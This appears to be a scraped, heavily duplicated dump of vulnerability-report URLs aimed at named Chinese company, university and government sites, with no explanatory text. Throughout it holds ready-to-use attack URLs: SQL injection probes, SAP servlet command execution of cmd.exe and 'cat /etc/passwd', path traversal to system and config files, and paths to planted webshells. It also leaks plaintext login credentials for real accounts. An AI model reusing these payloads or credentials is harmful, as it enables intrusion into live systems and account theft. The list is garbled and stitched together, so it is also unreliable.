http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ 
http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ 
http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist_ http://**.**.**/api/CheckMemberLogin.ashxUserID=0%27%20and%20@@version%3E0--&type=UserIsExist http://**.**.**.**/framework/UserMainPageWin8.aspx http://**.**.**.**//fileroot//1ee55b67-8e9f-4aae-9769-c9767515f8b2.asp http://**.**.**.**/download/aiov7.exe http://**.**.**/login.jsp     http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp_ http://**.**.**/login.jsp http://crm.9fbank.com/index.html http://crm.9fbank.com/crm/forgetPwd.html http://resume.shenzhenair.com/personedit_edit.action rKsSAAiQavn4hfpHo21:16542:0:99999:7 vj0:15916:0:99999:7 http://cloud.**.**.**.**/ http://cloud.**.**.**.**:58060/users http://cloud.**.**.**.**:58060/browse/dev/projects/weixin/05_source/trunk/superpark/04_parking_leasing/src/main/resources/conf/platform-conf.properties?r=595 http://cloud.**.**.**.**:18080/ https://cloud.**.**.**.**:58080/svn/ http://cloud.**.**.**.**/console/ http://sp.**.**.**.**:18002/ http://test.lxzq.com.cn/web/space/login.html https://www.hhycdai.com/question/tag?tagid=12 http://sjbwx.fuiou.com http://**.**.**.**/998.txt http://**.**.**.** http://**.**.**.** https://**.**.**.**/sionline/loginControler https://**.**.**.**/sionline/loginControler https://**.**.**.**/sionline/loginControler http://m.class.cn/user/register_ajax 
http://**.**.**.**/fblog/artview?ID=101&id=15594 http://**.**.**.**/index?m=ftheme&a=listbk&tpl=2&tid=214 http://**.**.**.**/fblog/index?ID=1850 http://**.**.**.**/index.php?mode=search&deep=4 http://**.**.**.**/bugs/wooyun-2015-0146520 http://weixin.jxlife.com.cn:80/jxlife/jsp/online/traffic_mobile_index_pc.jsp?Tab=1 http://bj.mangocity.com http://bj.mangocity.com www.acunetix-referrer.com http://**.**.**.**:80/manage http://**.**.**.**/hbzq/wz_info.jsp?infoid=19714 http://**.**.**.**/jj101.php?msn=0502&id=10 http://**.**.**.**:8070/ http://**.**.**.**:88/ http://**.**.**.**:8089/ http://**.**.**.**:8089/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**:8070/ http://124.227.11.82/index.jsp http://oa.eastmoney.com/ http://mys8.super8.com.cn:81/pages/ http://mys8.super8.com.cn:81/Resource/ http://mys8.super8.com.cn:81/CoreResource/ http://mys8.super8.com.cn:81/attached/ http://mys8.super8.com.cn:81/pages/BS/SupplierAudit/SupplierAuditManage.aspx http://shenpi.yonyou.com http://shenpi.yonyou.com/jbossass/jbossass.jsp http://shenpi.yonyou.com/jbossass/jbossass.jsp?ppp=whoami http://interface.benlai.com/Web.config.bak www.***** m.benlai.com/BenlaiWap/service/searchA/ http://**.**.**.**:8086/wfvideohkust/newPlay.action?sid=SD070209749存在命令执行漏洞 http://**.**.**.**/bugs/wooyun-2015-0146520 http://js1.ooopic.com/ http://js1.ooopic.com/images/uploads/10162015/1285essio1444962522.php http://**.**.**.**/modules/download/index.php?cid=3 http://dp.cnmo.com/hit_for_dp.php?pro_id=1 http://ask.eol.cn/search.do?page=5&query=%25 http://**.**.**.**:8080/alliances/alliance.jsp?c_id=19 http://a.bdmob.cn/topicslist.php?area_id=26 http://a.bdmob.cn/topicslist.php?area_id=26 http://sqlmap.org http://test.99.com/ test.99.com/RegisterUser/isNewUser http://kaipiaoba.homelink.com.cn http://**.**.**.**:8070/ http://**.**.**.**:88/ http://**.**.**.**:8089/ http://**.**.**.**:8089/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**:8070/ 
http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905 http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905 http://**.**.**.**/bugs/wooyun-2013-038943 http://m.mia.com/login?url=/cart http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421 http://**.**.**.**/portal_e2_page.php?button_num=e2&folder_id=4&cnt_id=421 http://cjgl.nipic.com/ http://www.xxsy.net/fangtan/104524*.html http://hr.jjshome.com/v/usercenter/register http://**.**.**.**/123/denglu.php http://**.**.**.**/123/admin/admin/upfiles/ice.php https://github.com/djh4230/MailWebLogin/blob/b8d0607c88536907374600f347e24682680812f9/MailLogin/src/com/mo9/CreditCenterCraw.java https://github.com/djh4230 https://mail.lianlian.com/owa/ http://58.62.185.148:88/seeyon/ http://58.62.185.148:88/seeyon/management/index.jsp http://**.**.**.**/aspnet_client/ http://**.**.**.**/ckfinder http://**.**.**.**/upload/ http://**.**.**.**/dl/images/ http://**.**.**.**/Log/ http://**.**.**.**/Control/ http://**.**.**.**/html/ http://**.**.**.**:8090/utr/utr/pro/pro-preview-pub!preview.action存在命令执行漏洞 http://106.120.158.40 http://106.120.158.40/UserAdd/DepartMentUserAdd.aspx?SelectType=1&SearchType=Proposer&Mode=dialog&TimeStamp=144496586841144089 https://www.name.com/ http://crm.zhenai.com/ http://weixin.zhenai.com/ http://crm.zhenai.com/crm.gz http://weixin.zhenai.com/resin-doc/viewfile/?file=index.jsp http://220.181.163.131:8010/ http://220.181.163.131:8010/ http://ufsdp.ufida.com/ http://ufsdp.ufida.com/UploadFile.aspx https://open.qbao.com/login.jsp https://open.qbao.com https://open.qbao.com/login.jsp http://ccmc.ecnu.edu.cn/admin/Default.aspx http://**.**.**.**:8090/ghjajcx/bacxAction!getSearchCase.action存在命令执行漏洞 https://fly.fuiou.com/pkgMng/queryScanPkg.sxf?FM= http://fly.fuiou.com,下载收件宝,更多优惠活动哟】 http://**.**.**.**/trq/detail?id=5973 http://**.**.**.**/hktc/content.aspx?id=20060612164107&lang=t http://**.**.**.**/index.php/Common/login 
https://github.com/enchanterhoo/aa/blob/fd1d283d8ef59c4dcb28ef9636373d354037fa2b/proj/config.py http://oa.hrsec.com.cn:89 http://**.**.**.**/ccr/People_All.aspx?Role=Core_Member http://**.**.**.**/com/People_All.aspx?Role=Administrative_Staff url:http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://scm.ctruck.com.cn:50000//ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://58.243.186.29:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://114.80.86.106:8080/uddiexplorer/SearchPublicRegistries.jsp https://mail.cofco.com https://mail.cofco.com http://crm.emar.com/login/login.php http://cd.ydpic.sgcc.com.cn/Login_init.action http://cd.ydpic.sgcc.com.cn/Login_login.action http://10.0.5.8/ydcc/ https://10.0.5.122:7002/casserver/login?service= http://10.0.5.88:9888/baojia/ http://10.0.5.88:9888/console/ http://10.0.5.111:7001/pjbjbd/ http://10.0.5.111:7001/console/ jdbc:oracle:thin:@10.0.5.*:1521:*** jdbc:oracle:thin:@10.0.5.*:1521:pub*** jdbc:oracle:thin:@10.0.5.*:1521:pub*** jdbc:oracle:thin:@10.0.35.*:1521:devgbkdb http://10.0.5.76:8008/imageSys/ http://tzb.ecnu.edu.cn/news.asp?id=707 http://www.eoffice.ecnu.edu.cn/new_gonggao/model/mode_1.asp?ID=4025 http://www.qinzhu.ecnu.edu.cn/department/HeartRoom/HeartFront/content.aspx?id=%201452 http://www.120ask.com/user/myQuestion/ClassSaves http://202.46.33.211:8090/PatientList.aspx https://passport.meituan.com/account/retrievepassword http://eduadmin.openonline.com.cn/BasicSystem/Teaching/Tplan_Material_DetailNew.aspx?MaterialOwnerShipID=4&RecruitBatchID=4701&LevelID=0&SpecialityID=0&universitycode=10006&UniversityName= https://github.com/HikoQiu/wsdutil/blob/c0c5451c319038f837e0ecc7eb0ae3dea8716704/TestUtils/src/com/weisd/email/Test.java http://bj.feiren.com/ 
https://**.**.**.**/cch1989630/rangerEasyPay/blob/f44036d497d9d9b2ec9d5168d801b0628d1c0780/resources/jdbc.properties jdbc:mysql**.**.**.**:3308/busiunon_tst?useUnicode=true&characterEncoding=utf8 http://ppt.qiban365.com/action/server.php?action=login http://cwmxt.dev.class.cn/login_manage/index http://cwmxt.dev.class.cn/login_manage/check_member http://www.gyzq.com/gyzq/gyfc/lxwm/cpyc/jl_xyzp.jsp?infoId=1055746&curId=00010002001500080002&random=0.29002362582832575 http://www.gyzq.com/download/photo/20151016/1445002749904.jsp inurl:product_show.asp?lb_id= http://**.**.**.**/product_show.asp?lb_id=34 http://**.**.**.**/products_show.asp?lb_id=39 http://**.**.**.**/products_show.asp?lb_id=38 http://**.**.**.**/product_show.asp?lb_id=211 http://nczx.yonyou.com/SubModule/Login/index.aspx http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTask.aspx?tasktype=2 http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTaskAttachs/tmp/62360545liuni/x.aspx http://**.**.**.**/bugs/wooyun-2010-086973有感而发 http://**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900021568 http://**.**.**.**/NTRdrS_RegistInfo.aspx?BookRecno=900021568 http://fanyi.baidu.com/transpage?from=auto&to=zh&query=http%3A%2F%2Fdb.health.hsw.cn%2Fhospital%2F1609.shtml&source=url&ie=utf8&render=1&aldtype=16047 http://**.**.**.**/phpmyadmin http://union.baidu.com/userlogin.action http://union.baidu.com/userlogin.action?redirect:/xxoo http://union.baidu.com/userlogin.action redirect:/xxoo=1 http://union.baidu.com/userlogin.action redirect:/xxoo=-1 http://union.baidu.com/xxoo;jsessionid=6A2E51000AE93C7F2126AC067338B598.worker1 http://www.west.cn/domains/whois.asp查询 http://www.west.cn/services/domain/whoisinfo.asp?domain=lcy8.cc http://robotim.vmall.com/live800/downlog.jsp http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/home/---xxxx-xx-/live800/WEB-INF/conf/dataSource.xml http://www.sdbe.gov.cn/2013/login/login.jsf?random=39 
http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/newsinfo.php?id=54 http://**.**.**.**/admin/login.php http://**.**.**.**////temp/16A25546352BF584B8EBAE1B97D12765/headPic/5f2e1491-e254-48de-becb-503c9315ff2f.jsp http://**.**.**.**/shop/hyzqindex/newDlym/ http://**.**.**.**/bugs/wooyun-2015-0144195 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/web/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://**.**.**.**/mainpage/PXXX/GG.aspx?ID=801&ShowMenu=0 http://113.98.225.143:8080//ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd https://mail2.mindray.com http://**.**.**.**/ fe97:1b06%4 http://oa.cofco-keystone.com/login.aspx?ReturnUrl=%2f http://**.**.**.**/admin/Login.asp http://www.**.**.**.**/Images/cpks.asp http://oa.gyzq.com http://wap1.oa.gyzq.com:8009 http://**.**.**.**这个系统 http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://**.**.**.**呢 http://**.**.**.** http://**.**.**.** http://oa.ebscn.hk/names.nsf?Login&UserName=kencheung&Password=23445502&RedirectTo=/weboa/webpage.nsf http://oa.ebscn.hk/names.nsf?Login&UserName=gracefu&Password=Jd010806&RedirectTo=/weboa/webpage.nsf http://oa.ebscn.hk/names.nsf?Login&UserName=manleeku&Password=h26067181&RedirectTo=/weboa/webpage.nsf http://sq.shfft.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://180.153.239.170:8083 http://180.153.239.170:8083/admin/ index.php/portal/search/main/?keyword=12 http://aws.amazon.com/cn/) url:http://**.**.**.**/etjz.html http://**.**.**.**/hgjj/hgjjjjsj.jsp?lmid=8a8180251bfd9002011bfdd92ac10049 http://wenxue.hongxiu.com/diary/search.asp?pd=zz&keyword=1 
http://**.**.**.**/taxi4mis/Area/nanjing/QyzxPage.aspx http://**.**.**.**/CMS/Logon.aspx http://12345678.blog.edu.cn/home.php?mod=space&uid=6288074&do=blog&id=706787 http://61.191.49.25:8081/wcc/index.jsp http://61.191.49.25:8081/upload/file/20151016231141/hr10.jsp jdbc:microsoft:sqlserver://127.0.0.1:1433;SelectMethod=Cursor;User=sa;Password=password;DatabaseName=csol_gjzq jdbc:oracle:thin:@192.168.0.207:1521:ora9i http://**.**.**.**/河南新乡市人口网,存在xss,但是后台是河南省人口卫生和生育网http://**.**.**.**/ http://www.youmiwan.com http://www3.hongxiu.com/hongxiu_read/bbs/s.aspx http://**.**.**.**/bugs/wooyun-2015-0147294 url:http://**.**.**.**/ http://**.**.**.**/jhmy/index.php http://www.jxxyxnfz.zjut.edu.cn/Front/SearchList.aspx?type= http://www.msexsgz.zjut.edu.cn/ShowNewsPageAction.do?newsID=622 http://www.ie.zjut.edu.cn/msc/index.php/Article/page?cid=18 http://www.ie.zjut.edu.cn/msc/index.php/Article/article2?cid=15 https://219.142.40.230/ http://119.40.53.11:8161/ http://**.**.**.**/bugs/wooyun-2015-0147294 http://**.**.**.**/jmcx/cs.htm http://**.**.**.**:81/JHMY/web/sz_etzl.jsp?sel=childno&no_name=321202080120050078&CX_Year=2005-11-25%27%20and*--&CX_Month=11&CX_Day=25 http://**.**.**.**:81/JHMY/web/sz_etzl.jsp?sel=childno&no_name=321202080120050078&CX_Year=2005-11-25%27%20and*--&CX_Month=11&CX_Day=25 http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://oa.yogi.com.cn/yyoa/index.jsp http://oa.yogi.com.cn/yyoa/assess/js/initDataAssess.jsp http://oa.yogi.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://oa.yogi.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://182.254.132.12/微拍某网站 https://github.com/xingganfengxing/monitor https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/java/com/letv/cdn/monitor/common/GlobalCacheInfo.java https://github.com/xingganfengxing/monitor/tree/master/branches/src/main/resources/conf 
https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/online/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/dev_online/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/dev_online/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/dev_test/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/conf/temp/application.properties https://github.com/xingganfengxing/monitor/blob/master/branches/src/main/resources/env.properties https://github.com/xingganfengxing/receiver https://github.com/xingganfengxing/receiver/tree/master/trunk https://github.com/xingganfengxing/receiver/blob/master/trunk/logparser/src/main/java/com/letvcloud/cdn/log/model/LogData.java https://github.com/xingganfengxing/openapi https://github.com/xingganfengxing/openapi/blob/master/src/main/resources/env.properties http://www.qu.cn/user.php?act=order_list http://**.**.**.**/admin/,打开后台网址,账号/密码admin/123456,然后进入后台: http://www.c3crm.com/site.zip http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/Web_Org/Class_Info.aspx?courseid=5027 http://**.**.**.**/nhisportal/login/login.jsp,此处验证码可重用,可撞库。 http://wapiknow.baidu.com/index?rn=10&word=thisisatest&sp=1&lm=0&ssid=0&from=0&bd_page_type=1&uid=3FF8F74389FC6EE64CD539477F8143A5%3ASL%3D0%3ANR%3D50&pu=sz%40224_240%2Cos%40&init=middle&step=7&cifr=p_se_all ftp://**.**.**.**/ http://www.emaotai.cn//ProductUnSales.aspx?keywords=wooyun&tagIds=1_2 http://www.emaotai.cn/wapshop/productList.aspx?keyWord= http://wq.jd.com 
http://wq.jd.com/eval/GetEval?productId=1861100&guid=a36bd4e1-fd8a-4a40-b86c-10dde98ba778&_=1445063083523&callback=jsonpCBK2&g_tk=2036964968&g_ty=ls http://**.**.**.**/index/login_.action http://**.**.**.**/admin/Admin_Login.asp,存在弱口令账户,admin/123456,登入后台是管理员: http://**.**.**.**/ http://**.**.**.**/aldfdnd.aspx?file=../global.asax http://edu.qiban365.com/admin http://edu.qiban365.com/install http://**.**.**.** http://**.**.**.**/web/Teacher!one.action?tid=55存在命令执行漏洞 http://zmt.southmoney.com http://baiyin.southmoney.com baiyin.southmoney.com/phpcms/base.php http://**.**.**.** zabbix:http://zabbix.emar.com/zabbix ops:http://zabbix.emar.com/ops/index.php/login http://zabbix.emar.com/ops/uploads/b.php http://www1.gyzq.com.hk/ http://www1.gyzq.com.hk/service/s_tzymjh.aspx?MenuNo=1 http://www1.gyzq.com.hk/service/khdown1.aspx?a=440101&moduleno=1 http://www1.gyzq.com.hk/service/guide.aspx?ModuleNo=1 http://www1.gyzq.com.hk/service/about.aspx?id=1 http://www1.gyzq.com.hk/newfile/showmsg.aspx?ID=3&ModuleNo=1 http://www1.gyzq.com.hk/info/newslist.aspx?menuno=1 http://www1.gyzq.com.hk/info/newsdetail.aspx?newsID=1 http://www1.gyzq.com.hk/en/service/khdown1.aspx?a=440102&moduleno=1 http://www1.gyzq.com.hk/en/service/guide.aspx?ModuleNo=1 http://www1.gyzq.com.hk/en/service/about.aspx?id=1 http://www1.gyzq.com.hk/en/info/newslist.aspx?MenuNo=1 http://www.51tr.com/openlist.php?class=24 http://www.51tr.com/info.php http://life.ecnu.edu.cn/picture/article/159/18/5b/9022e6b64f5c9cd9662812bc6f09/6d142795-1f6f-4378-b86f-94703dfe7af3.xls http://ifi.huayiweibo.com/webroot/index.php/View/viewtopic/title/%E7%A7%BB%E6%A4%8D%E4%B8%ADIFI%E7%9A%84%E9%A2%84%E9%98%B2%E7%AD%96%E7%95%A5 http://59.44.43.239/ http://59.44.43.239/emp_pro/GetNewAction.do http://59.44.43.239/emp_pro/getEmployeeInformationAction.do http://**.**.**.**/yell/f4ck.asp密码qwe123!@#li http://jl.bnchina.com/manage/ http://cc.bnchina.com/manage/ https://**.**.**.**/ 
http://**.**.**.**/page/maint/login/Page.jsp?templateId=8&logintype=1&gopage=&message=55 http://www.jcdd.hc360.com/ http://**.**.**.**/webservice.php?pid=4&title=%CB%AE%B7%D1%B2%E9%D1%AF https://**.**.**.**/ci/data/php/consulation/queryConsulationByTitle_sqlite.php?title=a'union+select+1111,22222,sql,444444,555555+from+sqlite_master http://**.**.**.**/space.php?uid=1 http://**.**.**.**/do.php http://59.151.27.155/login/ http://**.**.**.**/ http://**.**.**.**/nybwebService/getEntList.jsp http://**.**.**.** http://**.**.**.**/news/detail.asp?news_id=1098 https://im.qbao.com/ http://**.**.**.**/show.aspx?mid=44 http://www.scrcoa.com/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://**.**.**.**/admin88/admin_index.asp http://www.huayiyuan.com/ http://www.huayiyuan.com/attachment/201510/16/1889201_14450084090jOf.jpg/.php http://wooyun.org/bugs/wooyun-2015-0147241 http://pay.neuedu.com/login_view.action encap:Ethernet addr:10.3.17.40 Bcast:10.3.17.127 Mask:255.255.255.128 fe8b:3/64 Scope:Link MTU:1500 packets:245540099 packets:233582617 txqueuelen:1000 http://**.**.**.**/yyoa/common/SelectPerson/reloadData.jsp http://**.**.**.**/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://**.**.**.**/chn200905080651561/article.jsp?articleId=759 http://esp.haier.com/km/kb_loglist.jsp?userno=-1+OR+17-7=10&flag=3 http://t.qianbao666.com/api/1/msg/getInfo.api?id=176041 http://**.**.**.**/ http://**.**.**.**/Report/StandardReport.aspx?filename=Install&es_installid=198005 http://**.**.**.**/ContractDirectory http://www.edhic.com http://www.edhic.com/shop/yh/zhmm/ http://**.**.**.**:80/ http://**.**.**.**/index!down.action存在命令执行漏洞 http://**.**.**.**/ http://**.**.**.**/member/pinfo.html https://**.**.**.**/netgen-inc/weibo_sender/blob/master/test/etc/unit.original.json http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** 
http://**.**.**.** http://www.bj.**.**.**.** http://xy.**.**.**.** http://u_**.**.**.** http://www.sjz.**.**.**.** http://dikapfw.**.**.**.** http://w**.**.**.** http://bj.**.**.**.** http://ww.**.**.**.** http://st.**.**.**.** http://sh.**.**.**.** http://web.**.**.**.** http://huizhou.**.**.**.** http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**:8080/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Product/Com_Des.aspx?id=16 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/Teacher/Teach_Add.aspx?t_id=152 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 http://**.**.**.**/admin/school/AddSchool.aspx?t=0.8808870588783335&code=01 https://github.com/lusionx/hy-frame/blob/24fccd6ce850e2d358cebce672a9f3270eba3f62/HY.Frame.Web/Web.config Id:0;996 Package:Negotiate User:TIAOMACESHI$ Domain:WORKGROUP Id:0;64854009 Package:Negotiate User:ASP.NET Domain:IIS Id:0;583897 Package:NTLM User:Administrator Domain:TIAOMACESHI Id:0;997 Package:Negotiate User:LOCAL 
Id:0;37237 Package:NTLM http://crm.gtcloud.cn/ http://www.kingsunedu.com/Manager/default.aspx可以直接访问,其他页面有验证。 http://uums.kingsun.cn http://oa.joyu.com/.svn/entries http://oa.joyu.com/ http://www.krbb.cn/login/chklogin.asp http://www.krbb.cn/login/chklogin.asp http://**.**.**.**/ccsenews/a/epaper_content_show.asp?EpaperID=47&ContentTypeID=3&SerialNo=1 http://**.**.**.**/ccsenews/a/epaper_content_show.asp?EpaperID=47&ContentTypeID=3&SerialNo=1 http://**.**.**.**/love/love_go/pairs/YZComment.asp?pid=184 http://**.**.**.**/ccsenews/a/epaper_content_show.asp?EpaperID=47&ContentTypeID=3&SerialNo=1 http://**.**.**.**/department_newsdetial.php?news_id=889&type_id=3&t_id= http://**.**.**.**/Specimen/specimen.php?taiid=013529 http://**.**.**.**:88/thesis/view_etd.asp?URN=100424019 http://**.**.**.**/chi/guestboard2.php?original_id=3113 http://**.**.**.**/ETD-db/ETD-search/getfile?URN=etd-0830111-174602 http://**.**.**.**/paper_management/index.php?conf_alias=iihmsp10 http://**.**.**.**/chi/guestboard2.php?original_id=3113 http://211.162.66.44/ http://211.162.66.44/oanames.nsf webpage.nsf/cpassword?OpenForm webpage.nsf/main8?ReadForm webpage.nsf/portal?readForm&PortalUNID= todo.nsf/mainframeset?openframeset http://3g.trip8080.com/tologin.htm http://www.emaotai.cn/ http://www.emaotai.cn/User/ReplyReceivedMessage.aspx?MessageId=***** http://**.**.**.**/ http://**.**.**.**/Member/CheckMember.aspx http://**.**.**.** http://**.**.**.**/website/dfxhs_cx_gs.asp?DwID=7297 http://**.**.**.**/website/dfxhs_cx_gs.asp?DwID=7297 http://**.**.**.**:80/ http://cer.nju.edu.cn/amserver/UI/Login?goto=http://cms.nju.edu.cn/console/application.do&gotoOnFail=http://cms.nju.edu.cn/console/doLogin.do name:test password:123456 http://**.**.**.**/bugs/wooyun-2010-0136212 http://**.**.**.**/bugs/wooyun-2010-0136013 http://**.**.**.**/bugs/wooyun-2010-0112009 http://**.**.**.**:8888/hotelbs/default.aspx http://**.**.**.**/default.aspx http://**.**.**.**:235/dylgy/login.aspx 
